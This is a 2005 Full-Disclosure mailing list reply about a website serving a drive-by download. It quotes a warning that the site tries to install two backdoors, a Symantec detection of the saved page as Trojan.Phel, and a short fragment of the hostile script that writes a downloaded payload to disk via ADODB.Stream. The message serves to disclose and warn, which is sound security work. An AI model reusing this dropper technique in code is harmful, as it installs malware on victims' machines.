Re: http://molecularmultimedia.com/ an exploit distribution point

["Bart Lansing" <bart.lansing () hushmail com>]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Aditya,

Symantec AV defines that txt as:

Scan type:  Auto-Protect Scan
Event:  Threat Found!
Threat: Trojan.Phel
File:  E:\TEMP\notes53B1E5\molecularmultimedia.com.txt

Webamster and others @molecularmultimedia.com being cc'd on this
mail


On Mon, 03 Oct 2005 20:41:12 -0700 Aditya Deshmukh
<aditya.deshmukh () online gateway strangled net> wrote:
> ALERT do not visit with internet explorer
> http://molecularmultimedia.com/
>
> It attemps to download 2 backdoors - anyone want to inform them ?
>
> The homepage is a script
>
> ('ADODB.Stream');o.Mode=3;o.Type=1;o.Open();o.Write(b.responseBody)

> ;o.SaveTo
> File(d,2)
>
> Full script in the attachment...
>
>
> ___________________________________________________________________

> _____
> Delivered using the Free Personal Edition of Mailtraq
> (www.mailtraq.com)
-----BEGIN PGP SIGNATURE-----
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 2.4

wkYEARECAAYFAkNCf7EACgkQfw4CJpLBxOO3UwCgqyLcFdm6nxcFuOayJylt/6YaP8MA
niwSmSIHGjIfYm4GyuMYJ8X1Wr/W
=J3s+
-----END PGP SIGNATURE-----




Concerned about your privacy? Follow this link to get
secure FREE email: http://www.hushmail.com/?l=2

Free, ultra-private instant messaging with Hush Messenger
http://www.hushmail.com/services-messenger?l=434

Promote security and make money with the Hushmail Affiliate Program: 
http://www.hushmail.com/about-affiliate?l=427

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/